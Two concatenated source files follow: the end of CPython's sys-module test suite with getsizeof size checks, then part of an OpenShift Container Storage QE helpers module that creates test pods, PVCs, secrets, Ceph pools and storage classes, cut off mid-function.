env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non-existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1<<9
def setUp(self):
self.c = len(struct.pack('c', b' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
# add GC header size
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
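# A brief illustration of the '0P' trick (values shown for a typical 64-bit
# build and are platform-dependent): struct.calcsize('i') == 4, while the
# wrapper above returns struct.calcsize('i0P') == 8, i.e. the int field is
# padded up to pointer alignment.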
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
vh = self.vheader
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), size(vh + 'PP') + gc_header_size)
def test_default(self):
h = self.header
vh = self.vheader
size = self.calcsize
self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size(vh) + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(vh) + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size(h + 'P'))
# code
check(get_cell().__code__, size(h + '5i9Pi3P'))
# complex
check(complex(0,1), size(h + '2d'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size(h + '3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P' + '4P' + 8*'P2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size(h + '3P' + '4P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.keys(), size(h + 'P'))
# dictionary-valueiterator
check({}.values(), size(h + 'P'))
# dictionary-itemiterator
check({}.items(), size(h + 'P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# BaseException
check(BaseException(), size(h + '5Pi'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size(h + '5Pi 2P2PP'))
# UnicodeDecodeError
# XXX
# check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size(h + '5Pi 2P2PP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# reverse
check(reversed(''), size(h + 'PP'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'PP'))
# classmethod
check(bar, size(h + 'PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0, size(vh))
check(1, size(vh) + self.longdigit)
check(-1, size(vh) + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), size(vh) + 2*self.longdigit)
check(int(PyLong_BASE**2-1), size(vh) + 2*self.longdigit)
check(int(PyLong_BASE**2), size(vh) + 3*self.longdigit)
# memoryview
check(memoryview(b''), size(h + 'PPiP4P2i5P3c2P'))
# module
check(unittest, size(h + '3P'))
# None
check(None, size(h + ''))
# NotImplementedType
check(NotImplemented, size(h))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# range
check(range(1), size(h + '4P'))
check(range(66000), size(h + '4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(0), size(h + '3P'))
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# type
# static type: PyTypeObject
s = size(vh + 'P2P15Pl4PP9PP11PI')
check(int, s)
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs + 4P)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('34P 3P 10P 2P 4P')
# Separate block for PyDictKeysObject with 4 entries
s += size("PPPP") + 4*size("PPP")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size(h+"PPP4P"))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = h + "PPiP"
compactfields = asciifields + "PPP"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + 'P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, run
from uuid import uuid4
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
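# The "I" in DATE_TIME_FORMAT matches the klog severity prefix emitted by the
# CSI provisioner (log lines start like "I0523 14:00:00.123456 ...").
# A minimal parsing sketch, using a hypothetical log fragment:
#     mon_day = "I0523 14:00:00.123456"
#     datetime.datetime.strptime(f"2021 {mon_day}", DATE_TIME_FORMAT)
#     # -> datetime.datetime(2021, 5, 23, 14, 0, 0, 123456)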
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by combining the resource description,
the resource type and a random uuid (in hex) as a suffix, trimmed
because of the Kubernetes 63-character name length limitation
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
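# A hypothetical usage sketch: the generated name has the form
# "<resource_type>-<first 23 chars of description>-<uuid4 hex>", trimmed to at
# most 40 characters, e.g.:
#     create_unique_resource_name("cephfs", "pvc")
#     # -> something like "pvc-cephfs-9f1c2b3a4d5e6f708192a3b4c5"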
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
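# A minimal usage sketch, building the kwargs from a yaml template as done by
# the other helpers in this module:
#     pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
#     pvc_data["metadata"]["name"] = create_unique_resource_name("test", "pvc")
#     ocs_obj = create_resource(do_reload=True, **pvc_data)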
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
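# A minimal usage sketch, assuming an already created and Bound RBD PVC object
# (constants.STATUS_RUNNING is assumed to be defined in ocs_ci.ocs.constants):
#     pod_obj = create_pod(
#         interface_type=constants.CEPHBLOCKPOOL,
#         pvc_name=pvc_obj.name,
#         namespace=pvc_obj.namespace,
#     )
#     wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)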
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["compressionMode"] = compression
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
base_sc.wait_for_resource(
condition=resource_name,
column="NAME",
timeout=240,
)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
fs_name=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(e.g. 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
encryption_kms_id (str): ID of the KMS entry from connection details
fs_name (str): the name of the filesystem for CephFS StorageClass
Returns:
OCS: An OCS instance for the storage class
"""
yamls = {
constants.CEPHBLOCKPOOL: constants.CSI_RBD_STORAGECLASS_YAML,
constants.CEPHFILESYSTEM: constants.CSI_CEPHFS_STORAGECLASS_YAML,
}
sc_data = dict()
sc_data = templating.load_yaml(yamls[interface_type])
if interface_type == constants.CEPHBLOCKPOOL:
interface = constants.RBD_INTERFACE
sc_data["provisioner"] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
if rbd_thick_provision:
sc_data["parameters"]["thickProvision"] = "true"
if encrypted:
# Avoid circular imports
from ocs_ci.utility.kms import get_encryption_kmsid
sc_data["parameters"]["encrypted"] = "true"
sc_data["parameters"]["encryptionKMSID"] = (
encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
)
elif interface_type == constants.CEPHFILESYSTEM:
interface = constants.CEPHFS_INTERFACE
sc_data["parameters"]["fsName"] = fs_name if fs_name else get_cephfs_name()
sc_data["provisioner"] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data["parameters"]["pool"] = interface_name
sc_data["metadata"]["name"] = (
sc_name
if sc_name
else create_unique_resource_name(f"test-{interface}", "storageclass")
)
sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
for key in ["node-stage", "provisioner", "controller-expand"]:
sc_data["parameters"][f"csi.storage.k8s.io/{key}-secret-name"] = secret_name
sc_data["parameters"][
f"csi.storage.k8s.io/{key}-secret-namespace"
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data["reclaimPolicy"] = reclaim_policy
try:
del sc_data["parameters"]["userid"]
except KeyError:
pass
return create_resource(**sc_data)
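# A hypothetical usage sketch for an RBD storage class backed by a block pool
# and secret created with the helpers above:
#     cbp_obj = create_ceph_block_pool()
#     secret_obj = create_secret(constants.CEPHBLOCKPOOL)
#     sc_obj = create_storage_class(
#         interface_type=constants.CEPHBLOCKPOOL,
#         interface_name=cbp_obj.name,
#         secret_name=secret_obj.name,
#     )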
def create_pvc(
sc_name,
pvc_name=None,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None,
do_reload=True,
access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None,
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data["metadata"]["name"] = (
pvc_name if pvc_name else create_unique_resource_name("test", "pvc")
)
pvc_data["metadata"]["namespace"] = namespace
pvc_data["spec"]["accessModes"] = [access_mode]
pvc_data["spec"]["storageClassName"] = sc_name
if size:
pvc_data["spec"]["resources"]["requests"]["storage"] = size
if volume_mode:
pvc_data["spec"]["volumeMode"] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
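# A minimal usage sketch, assuming the default RBD storage class and that
# constants.STATUS_BOUND exists:
#     sc = default_storage_class(constants.CEPHBLOCKPOOL)
#     pvc_obj = create_pvc(sc_name=sc.name, size="5Gi")
#     wait_for_resource_state(pvc_obj, constants.STATUS_BOUND)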
def create_multiple_pvcs(
sc_name,
namespace,
number_of_pvc=1,
size=None,
